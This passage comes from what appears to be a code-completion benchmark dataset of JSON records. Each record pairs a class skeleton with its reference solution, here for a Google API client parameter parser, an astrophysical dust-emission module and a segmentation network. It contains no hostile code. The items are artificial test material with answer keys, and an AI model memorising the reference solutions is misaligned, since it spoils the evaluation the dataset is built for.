describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.argmap = {}\n self.required_params = []\n self.repeated_params = []\n self.pattern_params = {}\n self.query_params = []\n self.path_params = set()\n self.param_types = {}\n self.enum_params = {}\n self.set_parameters(method_desc)\n<|end_body_0|>\n\n<|body_start_1|>\n for arg, desc in six.iteritems(method_desc.get('parameters', {})):\n param = key2param(arg)\n self.argmap[param] = arg\n if desc.get('pattern'):\n self.pattern_params[param] = desc['pattern']\n if desc.get('enum'):\n self.enum_params[param] = desc['enum']\n if desc.get('required'):\n self.required_params.append(param)\n if desc.get('repeated'):\n self.repeated_params.append(param)\n if desc.get('location') == 'query':\n self.query_params.append(param)\n if desc.get('location') == 'path':\n self.path_params.add(param)\n self.param_types[param] = desc.get('type', 'string')\n for match in URITEMPLATE.finditer(method_desc['path']):\n for namematch in VARNAME.finditer(match.group(0)):\n name = key2param(namematch.group(0))\n self.path_params.add(name)\n if name in self.query_params:\n self.query_params.remove(name)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000404", "length_bytes": 42994, "license_type": "permissive", "methods": [{"docstring": "Constructor for ResourceMethodParameters. Sets default values and defers to set_parameters to populate. Args: method_desc: Dictionary with metadata describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.", "name": "__init__", "signature": "def __init__(self, method_desc)"}, {"docstring": "Populates maps and lists based on method description. Iterates through each parameter for the method and parses the values from the parameter dictionary. Args: method_desc: Dictionary with metadata describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.", "name": "set_parameters", "signature": "def set_parameters(self, method_desc)"}], "n_methods": 2, "prompt": "Implement the Python class `ResourceMethodParameters` described below.\n\nClass description:\nRepresents the parameters associated with a method. Attributes: argmap: Map from method parameter name (string) to query parameter name (string). required_params: List of required parameters (represented by parameter name as string). repeated_params: List of repeated parameters (represented by parameter name as string). pattern_params: Map from method parameter name (string) to regular expression (as a string). If the pattern is set for a parameter, the value for that parameter must match the regular expression. query_params: List of parameters (represented by parameter name as string) that will be used in the query string. path_params: Set of parameters (represented by parameter name as str\n\nMethod signatures and docstrings:\n- def __init__(self, method_desc): Constructor for ResourceMethodParameters. Sets default values and defers to set_parameters to populate. Args: method_desc: Dictionary with metadata describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.\n- def set_parameters(self, method_desc): Populates maps and lists based on method description. Iterates through each parameter for the method and parses the values from the parameter dictionary. Args: method_desc: Dictionary with metadata describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.", "prompted_full_text": "Implement the Python class `ResourceMethodParameters` described below.\n\nClass description:\nRepresents the parameters associated with a method. Attributes: argmap: Map from method parameter name (string) to query parameter name (string). required_params: List of required parameters (represented by parameter name as string). repeated_params: List of repeated parameters (represented by parameter name as string). pattern_params: Map from method parameter name (string) to regular expression (as a string). If the pattern is set for a parameter, the value for that parameter must match the regular expression. query_params: List of parameters (represented by parameter name as string) that will be used in the query string. path_params: Set of parameters (represented by parameter name as str\n\nMethod signatures and docstrings:\n- def __init__(self, method_desc): Constructor for ResourceMethodParameters. Sets default values and defers to set_parameters to populate. Args: method_desc: Dictionary with metadata describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.\n- def set_parameters(self, method_desc): Populates maps and lists based on method description. Iterates through each parameter for the method and parses the values from the parameter dictionary. Args: method_desc: Dictionary with metadata describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.\n\n<|skeleton|>\nclass ResourceMethodParameters:\n \"\"\"Represents the parameters associated with a method. Attributes: argmap: Map from method parameter name (string) to query parameter name (string). required_params: List of required parameters (represented by parameter name as string). repeated_params: List of repeated parameters (represented by parameter name as string). pattern_params: Map from method parameter name (string) to regular expression (as a string). If the pattern is set for a parameter, the value for that parameter must match the regular expression. query_params: List of parameters (represented by parameter name as string) that will be used in the query string. path_params: Set of parameters (represented by parameter name as str\"\"\"\n\n def __init__(self, method_desc):\n \"\"\"Constructor for ResourceMethodParameters. Sets default values and defers to set_parameters to populate. Args: method_desc: Dictionary with metadata describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.\"\"\"\n <|body_0|>\n\n def set_parameters(self, method_desc):\n \"\"\"Populates maps and lists based on method description. Iterates through each parameter for the method and parses the values from the parameter dictionary. Args: method_desc: Dictionary with metadata describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.argmap = {}\n self.required_params = []\n self.repeated_params = []\n self.pattern_params = {}\n self.query_params = []\n self.path_params = set()\n self.param_types = {}\n self.enum_params = {}\n self.set_parameters(method_desc)\n<|end_body_0|>\n\n<|body_start_1|>\n for arg, desc in six.iteritems(method_desc.get('parameters', {})):\n param = key2param(arg)\n self.argmap[param] = arg\n if desc.get('pattern'):\n self.pattern_params[param] = desc['pattern']\n if desc.get('enum'):\n self.enum_params[param] = desc['enum']\n if desc.get('required'):\n self.required_params.append(param)\n if desc.get('repeated'):\n self.repeated_params.append(param)\n if desc.get('location') == 'query':\n self.query_params.append(param)\n if desc.get('location') == 'path':\n self.path_params.add(param)\n self.param_types[param] = desc.get('type', 'string')\n for match in URITEMPLATE.finditer(method_desc['path']):\n for namematch in VARNAME.finditer(match.group(0)):\n name = key2param(namematch.group(0))\n self.path_params.add(name)\n if name in self.query_params:\n self.query_params.remove(name)\n<|end_body_1|>\n", "revision_id": "975a95032ce5b7012d1772c7f1f5cfe606eae839", "skeleton": "<|skeleton|>\nclass ResourceMethodParameters:\n \"\"\"Represents the parameters associated with a method. Attributes: argmap: Map from method parameter name (string) to query parameter name (string). required_params: List of required parameters (represented by parameter name as string). repeated_params: List of repeated parameters (represented by parameter name as string). pattern_params: Map from method parameter name (string) to regular expression (as a string). If the pattern is set for a parameter, the value for that parameter must match the regular expression. query_params: List of parameters (represented by parameter name as string) that will be used in the query string. path_params: Set of parameters (represented by parameter name as str\"\"\"\n\n def __init__(self, method_desc):\n \"\"\"Constructor for ResourceMethodParameters. Sets default values and defers to set_parameters to populate. Args: method_desc: Dictionary with metadata describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.\"\"\"\n <|body_0|>\n\n def set_parameters(self, method_desc):\n \"\"\"Populates maps and lists based on method description. Iterates through each parameter for the method and parses the values from the parameter dictionary. Args: method_desc: Dictionary with metadata describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ResourceMethodParameters:\n \"\"\"Represents the parameters associated with a method. Attributes: argmap: Map from method parameter name (string) to query parameter name (string). required_params: List of required parameters (represented by parameter name as string). repeated_params: List of repeated parameters (represented by parameter name as string). pattern_params: Map from method parameter name (string) to regular expression (as a string). If the pattern is set for a parameter, the value for that parameter must match the regular expression. query_params: List of parameters (represented by parameter name as string) that will be used in the query string. path_params: Set of parameters (represented by parameter name as str\"\"\"\n\n def __init__(self, method_desc):\n \"\"\"Constructor for ResourceMethodParameters. Sets default values and defers to set_parameters to populate. Args: method_desc: Dictionary with metadata describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.\"\"\"\n self.argmap = {}\n self.required_params = []\n self.repeated_params = []\n self.pattern_params = {}\n self.query_params = []\n self.path_params = set()\n self.param_types = {}\n self.enum_params = {}\n self.set_parameters(method_desc)\n\n def set_parameters(self, method_desc):\n \"\"\"Populates maps and lists based on method description. Iterates through each parameter for the method and parses the values from the parameter dictionary. Args: method_desc: Dictionary with metadata describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.\"\"\"\n for arg, desc in six.iteritems(method_desc.get('parameters', {})):\n param = key2param(arg)\n self.argmap[param] = arg\n if desc.get('pattern'):\n self.pattern_params[param] = desc['pattern']\n if desc.get('enum'):\n self.enum_params[param] = desc['enum']\n if desc.get('required'):\n self.required_params.append(param)\n if desc.get('repeated'):\n self.repeated_params.append(param)\n if desc.get('location') == 'query':\n self.query_params.append(param)\n if desc.get('location') == 'path':\n self.path_params.add(param)\n self.param_types[param] = desc.get('type', 'string')\n for match in URITEMPLATE.finditer(method_desc['path']):\n for namematch in VARNAME.finditer(match.group(0)):\n name = key2param(namematch.group(0))\n self.path_params.add(name)\n if name in self.query_params:\n self.query_params.remove(name)\n", "source": "the_stack_v2_python_sparse", "source_path": "courses/machine_learning/deepdive2/structured/solutions/serving/application/lib/googleapiclient/discovery.py", "source_repo": "GoogleCloudPlatform/training-data-analyst", "split": "test", "star_events_count": 7311} {"blob_id": "8865dfe158b150b0a67e9939b9d6180d4c4a3997", "bodies": ["self.epsilon = float(self.parameters['epsilon_mbb'])\nself.T = float(self.parameters['t_mbb'])\nself.beta = float(self.parameters['beta_mbb'])\nself.energy_balance = bool(self.parameters['energy_balance'])\nif self.epsilon < 0.0:\n raise Exception('Error, epsilon_mbb must be ≥ 0.')\nc = cst.c * 1000000000.0\nlambda_0 = 200000.0\nself.wave = np.logspace(3.0, 6.0, 1000.0)\nconv = c / (self.wave * self.wave)\nself.lumin_mbb = conv * (1.0 - np.exp(-(lambda_0 / self.wave) ** self.beta)) * (c / self.wave) ** 3.0 / (np.exp(cst.h * c / (self.wave * cst.k * self.T)) - 1.0)\nnorm = np.trapz(self.lumin_mbb, x=self.wave)\nself.lumin_mbb /= norm", "if 'dust.luminosity' not in sed.info:\n sed.add_info('dust.luminosity', 1.0, True)\nluminosity = sed.info['dust.luminosity']\nsed.add_module(self.name, self.parameters)\nsed.add_info('dust.t_mbb', self.T)\nsed.add_info('dust.beta_mbb', self.beta)\nsed.add_info('dust.epsilon_mbb', self.epsilon)\nif self.energy_balance:\n other_dust_contributions = [contrib for contrib in sed.contribution_names if 'dust' in contrib]\n for item in other_dust_contributions:\n item_balance = item + '_balance'\n lumin = sed.get_lumin_contribution(item)\n wavelength = sed.wavelength_grid\n sed.add_info(item_balance, 1.0, True)\n sed.add_contribution(item_balance, wavelength, -lumin * self.epsilon)\nsed.add_contribution('dust.mbb', self.wave, luminosity * self.epsilon * self.lumin_mbb)"], "bodies_text": "<|body_start_0|>\n self.epsilon = float(self.parameters['epsilon_mbb'])\n self.T = float(self.parameters['t_mbb'])\n self.beta = float(self.parameters['beta_mbb'])\n self.energy_balance = bool(self.parameters['energy_balance'])\n if self.epsilon < 0.0:\n raise Exception('Error, epsilon_mbb must be ≥ 0.')\n c = cst.c * 1000000000.0\n lambda_0 = 200000.0\n self.wave = np.logspace(3.0, 6.0, 1000.0)\n conv = c / (self.wave * self.wave)\n self.lumin_mbb = conv * (1.0 - np.exp(-(lambda_0 / self.wave) ** self.beta)) * (c / self.wave) ** 3.0 / (np.exp(cst.h * c / (self.wave * cst.k * self.T)) - 1.0)\n norm = np.trapz(self.lumin_mbb, x=self.wave)\n self.lumin_mbb /= norm\n<|end_body_0|>\n\n<|body_start_1|>\n if 'dust.luminosity' not in sed.info:\n sed.add_info('dust.luminosity', 1.0, True)\n luminosity = sed.info['dust.luminosity']\n sed.add_module(self.name, self.parameters)\n sed.add_info('dust.t_mbb', self.T)\n sed.add_info('dust.beta_mbb', self.beta)\n sed.add_info('dust.epsilon_mbb', self.epsilon)\n if self.energy_balance:\n other_dust_contributions = [contrib for contrib in sed.contribution_names if 'dust' in contrib]\n for item in other_dust_contributions:\n item_balance = item + '_balance'\n lumin = sed.get_lumin_contribution(item)\n wavelength = sed.wavelength_grid\n sed.add_info(item_balance, 1.0, True)\n sed.add_contribution(item_balance, wavelength, -lumin * self.epsilon)\n sed.add_contribution('dust.mbb', self.wave, luminosity * self.epsilon * self.lumin_mbb)\n<|end_body_1|>\n", "class_docstring": "One modified black body IR re-emission Given an amount of attenuation (e.g. resulting from the action of a dust attenuation module) this module normalises MBB plus any previous IR contribution to this amount of energy. The final SED allows to keep the energy balance or not..", "class_name": "MBB", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MBB:\n \"\"\"One modified black body IR re-emission Given an amount of attenuation (e.g. resulting from the action of a dust attenuation module) this module normalises MBB plus any previous IR contribution to this amount of energy. The final SED allows to keep the energy balance or not..\"\"\"\n\n def _init_code(self):\n \"\"\"Build the model for a given set of parameters.\"\"\"\n <|body_0|>\n\n def process(self, sed):\n \"\"\"Add the IR re-emission contributions. Parameters ---------- sed: pcigale.sed.SED object\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.epsilon = float(self.parameters['epsilon_mbb'])\n self.T = float(self.parameters['t_mbb'])\n self.beta = float(self.parameters['beta_mbb'])\n self.energy_balance = bool(self.parameters['energy_balance'])\n if self.epsilon < 0.0:\n raise Exception('Error, epsilon_mbb must be ≥ 0.')\n c = cst.c * 1000000000.0\n lambda_0 = 200000.0\n self.wave = np.logspace(3.0, 6.0, 1000.0)\n conv = c / (self.wave * self.wave)\n self.lumin_mbb = conv * (1.0 - np.exp(-(lambda_0 / self.wave) ** self.beta)) * (c / self.wave) ** 3.0 / (np.exp(cst.h * c / (self.wave * cst.k * self.T)) - 1.0)\n norm = np.trapz(self.lumin_mbb, x=self.wave)\n self.lumin_mbb /= norm\n<|end_body_0|>\n\n<|body_start_1|>\n if 'dust.luminosity' not in sed.info:\n sed.add_info('dust.luminosity', 1.0, True)\n luminosity = sed.info['dust.luminosity']\n sed.add_module(self.name, self.parameters)\n sed.add_info('dust.t_mbb', self.T)\n sed.add_info('dust.beta_mbb', self.beta)\n sed.add_info('dust.epsilon_mbb', self.epsilon)\n if self.energy_balance:\n other_dust_contributions = [contrib for contrib in sed.contribution_names if 'dust' in contrib]\n for item in other_dust_contributions:\n item_balance = item + '_balance'\n lumin = sed.get_lumin_contribution(item)\n wavelength = sed.wavelength_grid\n sed.add_info(item_balance, 1.0, True)\n sed.add_contribution(item_balance, wavelength, -lumin * self.epsilon)\n sed.add_contribution('dust.mbb', self.wave, luminosity * self.epsilon * self.lumin_mbb)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000405", "length_bytes": 4961, "license_type": "no_license", "methods": [{"docstring": "Build the model for a given set of parameters.", "name": "_init_code", "signature": "def _init_code(self)"}, {"docstring": "Add the IR re-emission contributions. Parameters ---------- sed: pcigale.sed.SED object", "name": "process", "signature": "def process(self, sed)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005543", "prompt": "Implement the Python class `MBB` described below.\n\nClass description:\nOne modified black body IR re-emission Given an amount of attenuation (e.g. resulting from the action of a dust attenuation module) this module normalises MBB plus any previous IR contribution to this amount of energy. The final SED allows to keep the energy balance or not..\n\nMethod signatures and docstrings:\n- def _init_code(self): Build the model for a given set of parameters.\n- def process(self, sed): Add the IR re-emission contributions. Parameters ---------- sed: pcigale.sed.SED object", "prompted_full_text": "Implement the Python class `MBB` described below.\n\nClass description:\nOne modified black body IR re-emission Given an amount of attenuation (e.g. resulting from the action of a dust attenuation module) this module normalises MBB plus any previous IR contribution to this amount of energy. The final SED allows to keep the energy balance or not..\n\nMethod signatures and docstrings:\n- def _init_code(self): Build the model for a given set of parameters.\n- def process(self, sed): Add the IR re-emission contributions. Parameters ---------- sed: pcigale.sed.SED object\n\n<|skeleton|>\nclass MBB:\n \"\"\"One modified black body IR re-emission Given an amount of attenuation (e.g. resulting from the action of a dust attenuation module) this module normalises MBB plus any previous IR contribution to this amount of energy. The final SED allows to keep the energy balance or not..\"\"\"\n\n def _init_code(self):\n \"\"\"Build the model for a given set of parameters.\"\"\"\n <|body_0|>\n\n def process(self, sed):\n \"\"\"Add the IR re-emission contributions. Parameters ---------- sed: pcigale.sed.SED object\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.epsilon = float(self.parameters['epsilon_mbb'])\n self.T = float(self.parameters['t_mbb'])\n self.beta = float(self.parameters['beta_mbb'])\n self.energy_balance = bool(self.parameters['energy_balance'])\n if self.epsilon < 0.0:\n raise Exception('Error, epsilon_mbb must be ≥ 0.')\n c = cst.c * 1000000000.0\n lambda_0 = 200000.0\n self.wave = np.logspace(3.0, 6.0, 1000.0)\n conv = c / (self.wave * self.wave)\n self.lumin_mbb = conv * (1.0 - np.exp(-(lambda_0 / self.wave) ** self.beta)) * (c / self.wave) ** 3.0 / (np.exp(cst.h * c / (self.wave * cst.k * self.T)) - 1.0)\n norm = np.trapz(self.lumin_mbb, x=self.wave)\n self.lumin_mbb /= norm\n<|end_body_0|>\n\n<|body_start_1|>\n if 'dust.luminosity' not in sed.info:\n sed.add_info('dust.luminosity', 1.0, True)\n luminosity = sed.info['dust.luminosity']\n sed.add_module(self.name, self.parameters)\n sed.add_info('dust.t_mbb', self.T)\n sed.add_info('dust.beta_mbb', self.beta)\n sed.add_info('dust.epsilon_mbb', self.epsilon)\n if self.energy_balance:\n other_dust_contributions = [contrib for contrib in sed.contribution_names if 'dust' in contrib]\n for item in other_dust_contributions:\n item_balance = item + '_balance'\n lumin = sed.get_lumin_contribution(item)\n wavelength = sed.wavelength_grid\n sed.add_info(item_balance, 1.0, True)\n sed.add_contribution(item_balance, wavelength, -lumin * self.epsilon)\n sed.add_contribution('dust.mbb', self.wave, luminosity * self.epsilon * self.lumin_mbb)\n<|end_body_1|>\n", "revision_id": "9ef9b99425537350b8706fddfe90ed47301107a5", "skeleton": "<|skeleton|>\nclass MBB:\n \"\"\"One modified black body IR re-emission Given an amount of attenuation (e.g. resulting from the action of a dust attenuation module) this module normalises MBB plus any previous IR contribution to this amount of energy. The final SED allows to keep the energy balance or not..\"\"\"\n\n def _init_code(self):\n \"\"\"Build the model for a given set of parameters.\"\"\"\n <|body_0|>\n\n def process(self, sed):\n \"\"\"Add the IR re-emission contributions. Parameters ---------- sed: pcigale.sed.SED object\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MBB:\n \"\"\"One modified black body IR re-emission Given an amount of attenuation (e.g. resulting from the action of a dust attenuation module) this module normalises MBB plus any previous IR contribution to this amount of energy. The final SED allows to keep the energy balance or not..\"\"\"\n\n def _init_code(self):\n \"\"\"Build the model for a given set of parameters.\"\"\"\n self.epsilon = float(self.parameters['epsilon_mbb'])\n self.T = float(self.parameters['t_mbb'])\n self.beta = float(self.parameters['beta_mbb'])\n self.energy_balance = bool(self.parameters['energy_balance'])\n if self.epsilon < 0.0:\n raise Exception('Error, epsilon_mbb must be ≥ 0.')\n c = cst.c * 1000000000.0\n lambda_0 = 200000.0\n self.wave = np.logspace(3.0, 6.0, 1000.0)\n conv = c / (self.wave * self.wave)\n self.lumin_mbb = conv * (1.0 - np.exp(-(lambda_0 / self.wave) ** self.beta)) * (c / self.wave) ** 3.0 / (np.exp(cst.h * c / (self.wave * cst.k * self.T)) - 1.0)\n norm = np.trapz(self.lumin_mbb, x=self.wave)\n self.lumin_mbb /= norm\n\n def process(self, sed):\n \"\"\"Add the IR re-emission contributions. Parameters ---------- sed: pcigale.sed.SED object\"\"\"\n if 'dust.luminosity' not in sed.info:\n sed.add_info('dust.luminosity', 1.0, True)\n luminosity = sed.info['dust.luminosity']\n sed.add_module(self.name, self.parameters)\n sed.add_info('dust.t_mbb', self.T)\n sed.add_info('dust.beta_mbb', self.beta)\n sed.add_info('dust.epsilon_mbb', self.epsilon)\n if self.energy_balance:\n other_dust_contributions = [contrib for contrib in sed.contribution_names if 'dust' in contrib]\n for item in other_dust_contributions:\n item_balance = item + '_balance'\n lumin = sed.get_lumin_contribution(item)\n wavelength = sed.wavelength_grid\n sed.add_info(item_balance, 1.0, True)\n sed.add_contribution(item_balance, wavelength, -lumin * self.epsilon)\n sed.add_contribution('dust.mbb', self.wave, luminosity * self.epsilon * self.lumin_mbb)\n", "source": "the_stack_v2_python_sparse", "source_path": "pcigale/sed_modules/mbb.py", "source_repo": "JohannesBuchner/cigale", "split": "test", "star_events_count": 5} {"blob_id": "b70e73edb101e6303b655e31f58aa1ebc22cac70", "bodies": ["super(Segmentor, self).__init__(parameters)\nself.layer_list = add_conv_block(self.Conv, self.BatchNorm, in_channels=anatomy_factors, out_channels=self.base_filters * 4)\nself.layer_list += add_conv_block(self.Conv, self.BatchNorm, in_channels=self.base_filters * 4, out_channels=self.base_filters * 4)\nself.conv = self.Conv(self.base_filters * 4, self.n_classes, 1, 1, 0)\nself.layers = nn.ModuleList(self.layer_list)\nself.apply(self.weight_init)\nnn.init.xavier_normal_(self.conv.weight.data)\nself.conv.bias.data.zero_()", "for module in model.modules():\n if isinstance(module, nn.Conv2d) or isinstance(module, nn.Linear):\n nn.init.kaiming_normal_(module.weight)\n if module.bias is not None:\n module.bias.data.zero_()", "for i, f in enumerate(self.layers):\n if i % 2 == 0:\n x = f(x)\n else:\n x = F.leaky_relu(f(x), 0.2)\nx = F.softmax(self.conv(x), dim=1)\nreturn x"], "bodies_text": "<|body_start_0|>\n super(Segmentor, self).__init__(parameters)\n self.layer_list = add_conv_block(self.Conv, self.BatchNorm, in_channels=anatomy_factors, out_channels=self.base_filters * 4)\n self.layer_list += add_conv_block(self.Conv, self.BatchNorm, in_channels=self.base_filters * 4, out_channels=self.base_filters * 4)\n self.conv = self.Conv(self.base_filters * 4, self.n_classes, 1, 1, 0)\n self.layers = nn.ModuleList(self.layer_list)\n self.apply(self.weight_init)\n nn.init.xavier_normal_(self.conv.weight.data)\n self.conv.bias.data.zero_()\n<|end_body_0|>\n\n<|body_start_1|>\n for module in model.modules():\n if isinstance(module, nn.Conv2d) or isinstance(module, nn.Linear):\n nn.init.kaiming_normal_(module.weight)\n if module.bias is not None:\n module.bias.data.zero_()\n<|end_body_1|>\n\n<|body_start_2|>\n for i, f in enumerate(self.layers):\n if i % 2 == 0:\n x = f(x)\n else:\n x = F.leaky_relu(f(x), 0.2)\n x = F.softmax(self.conv(x), dim=1)\n return x\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Segmentor", "detected_licenses": ["Apache-2.0", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Segmentor:\n\n def __init__(self, parameters, anatomy_factors):\n \"\"\"Segmentor module for SDNet. Args: parameters (dict): A dictionary containing model parameters. anatomy_factors (int): The number of anatomical factors to be considered. Attributes: layer_list (list): List of layers in the Segmentor module. conv (nn.Conv2d): Convolutional layer to generate the final output. layers (nn.ModuleList): List of layers in the Segmentor module.\"\"\"\n <|body_0|>\n\n def weight_init(model):\n \"\"\"Initialize weights for the given model using He (Kaiming) initialization. Args: model (nn.Module): Model for which the weights will be initialized.\"\"\"\n <|body_1|>\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"Forward pass of the Segmentor module. Args: x (torch.Tensor): Input tensor (anatomy factors). Returns: torch.Tensor: Segmentation map output tensor.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Segmentor, self).__init__(parameters)\n self.layer_list = add_conv_block(self.Conv, self.BatchNorm, in_channels=anatomy_factors, out_channels=self.base_filters * 4)\n self.layer_list += add_conv_block(self.Conv, self.BatchNorm, in_channels=self.base_filters * 4, out_channels=self.base_filters * 4)\n self.conv = self.Conv(self.base_filters * 4, self.n_classes, 1, 1, 0)\n self.layers = nn.ModuleList(self.layer_list)\n self.apply(self.weight_init)\n nn.init.xavier_normal_(self.conv.weight.data)\n self.conv.bias.data.zero_()\n<|end_body_0|>\n\n<|body_start_1|>\n for module in model.modules():\n if isinstance(module, nn.Conv2d) or isinstance(module, nn.Linear):\n nn.init.kaiming_normal_(module.weight)\n if module.bias is not None:\n module.bias.data.zero_()\n<|end_body_1|>\n\n<|body_start_2|>\n for i, f in enumerate(self.layers):\n if i % 2 == 0:\n x = f(x)\n else:\n x = F.leaky_relu(f(x), 0.2)\n x = F.softmax(self.conv(x), dim=1)\n return x\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000406", "length_bytes": 14834, "license_type": "permissive", "methods": [{"docstring": "Segmentor module for SDNet. Args: parameters (dict): A dictionary containing model parameters. anatomy_factors (int): The number of anatomical factors to be considered. Attributes: layer_list (list): List of layers in the Segmentor module. conv (nn.Conv2d): Convolutional layer to generate the final output. layers (nn.ModuleList): List of layers in the Segmentor module.", "name": "__init__", "signature": "def __init__(self, parameters, anatomy_factors)"}, {"docstring": "Initialize weights for the given model using He (Kaiming) initialization. Args: model (nn.Module): Model for which the weights will be initialized.", "name": "weight_init", "signature": "def weight_init(model)"}, {"docstring": "Forward pass of the Segmentor module. Args: x (torch.Tensor): Input tensor (anatomy factors). Returns: torch.Tensor: Segmentation map output tensor.", "name": "forward", "signature": "def forward(self, x: torch.Tensor) -> torch.Tensor"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_006697", "prompt": "Implement the Python class `Segmentor` described below.\n\nClass description:\nImplement the Segmentor class.\n\nMethod signatures and docstrings:\n- def __init__(self, parameters, anatomy_factors): Segmentor module for SDNet. Args: parameters (dict): A dictionary containing model parameters. anatomy_factors (int): The number of anatomical factors to be considered. Attributes: layer_list (list): List of layers in the Segmentor module. conv (nn.Conv2d): Convolutional layer to generate the final output. layers (nn.ModuleList): List of layers in the Segmentor module.\n- def weight_init(model): Initialize weights for the given model using He (Kaiming) initialization. Args: model (nn.Module): Model for which the weights will be initialized.\n- def forward(self, x: torch.Tensor) -> torch.Tensor: Forward pass of the Segmentor module. Args: x (torch.Tensor): Input tensor (anatomy factors). Returns: torch.Tensor: Segmentation map output tensor.", "prompted_full_text": "Implement the Python class `Segmentor` described below.\n\nClass description:\nImplement the Segmentor class.\n\nMethod signatures and docstrings:\n- def __init__(self, parameters, anatomy_factors): Segmentor module for SDNet. Args: parameters (dict): A dictionary containing model parameters. anatomy_factors (int): The number of anatomical factors to be considered. Attributes: layer_list (list): List of layers in the Segmentor module. conv (nn.Conv2d): Convolutional layer to generate the final output. layers (nn.ModuleList): List of layers in the Segmentor module.\n- def weight_init(model): Initialize weights for the given model using He (Kaiming) initialization. Args: model (nn.Module): Model for which the weights will be initialized.\n- def forward(self, x: torch.Tensor) -> torch.Tensor: Forward pass of the Segmentor module. Args: x (torch.Tensor): Input tensor (anatomy factors). Returns: torch.Tensor: Segmentation map output tensor.\n\n<|skeleton|>\nclass Segmentor:\n\n def __init__(self, parameters, anatomy_factors):\n \"\"\"Segmentor module for SDNet. Args: parameters (dict): A dictionary containing model parameters. anatomy_factors (int): The number of anatomical factors to be considered. Attributes: layer_list (list): List of layers in the Segmentor module. conv (nn.Conv2d): Convolutional layer to generate the final output. layers (nn.ModuleList): List of layers in the Segmentor module.\"\"\"\n <|body_0|>\n\n def weight_init(model):\n \"\"\"Initialize weights for the given model using He (Kaiming) initialization. Args: model (nn.Module): Model for which the weights will be initialized.\"\"\"\n <|body_1|>\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"Forward pass of the Segmentor module. Args: x (torch.Tensor): Input tensor (anatomy factors). Returns: torch.Tensor: Segmentation map output tensor.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Segmentor, self).__init__(parameters)\n self.layer_list = add_conv_block(self.Conv, self.BatchNorm, in_channels=anatomy_factors, out_channels=self.base_filters * 4)\n self.layer_list += add_conv_block(self.Conv, self.BatchNorm, in_channels=self.base_filters * 4, out_channels=self.base_filters * 4)\n self.conv = self.Conv(self.base_filters * 4, self.n_classes, 1, 1, 0)\n self.layers = nn.ModuleList(self.layer_list)\n self.apply(self.weight_init)\n nn.init.xavier_normal_(self.conv.weight.data)\n self.conv.bias.data.zero_()\n<|end_body_0|>\n\n<|body_start_1|>\n for module in model.modules():\n if isinstance(module, nn.Conv2d) or isinstance(module, nn.Linear):\n nn.init.kaiming_normal_(module.weight)\n if module.bias is not None:\n module.bias.data.zero_()\n<|end_body_1|>\n\n<|body_start_2|>\n for i, f in enumerate(self.layers):\n if i % 2 == 0:\n x = f(x)\n else:\n x = F.leaky_relu(f(x), 0.2)\n x = F.softmax(self.conv(x), dim=1)\n return x\n<|end_body_2|>\n", "revision_id": "72eb99f68205afd5f8d49a3bb6cfc08cfd467582", "skeleton": "<|skeleton|>\nclass Segmentor:\n\n def __init__(self, parameters, anatomy_factors):\n \"\"\"Segmentor module for SDNet. Args: parameters (dict): A dictionary containing model parameters. anatomy_factors (int): The number of anatomical factors to be considered. Attributes: layer_list (list): List of layers in the Segmentor module. conv (nn.Conv2d): Convolutional layer to generate the final output. layers (nn.ModuleList): List of layers in the Segmentor module.\"\"\"\n <|body_0|>\n\n def weight_init(model):\n \"\"\"Initialize weights for the given model using He (Kaiming) initialization. Args: model (nn.Module): Model for which the weights will be initialized.\"\"\"\n <|body_1|>\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"Forward pass of the Segmentor module. Args: x (torch.Tensor): Input tensor (anatomy factors). Returns: torch.Tensor: Segmentation map output tensor.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Segmentor:\n def __init__(self, parameters, anatomy_factors):\n \"\"\"Segmentor module for SDNet. Args: parameters (dict): A dictionary containing model parameters. anatomy_factors (int): The number of anatomical factors to be considered. Attributes: layer_list (list): List of layers in the Segmentor module. conv (nn.Conv2d): Convolutional layer to generate the final output. layers 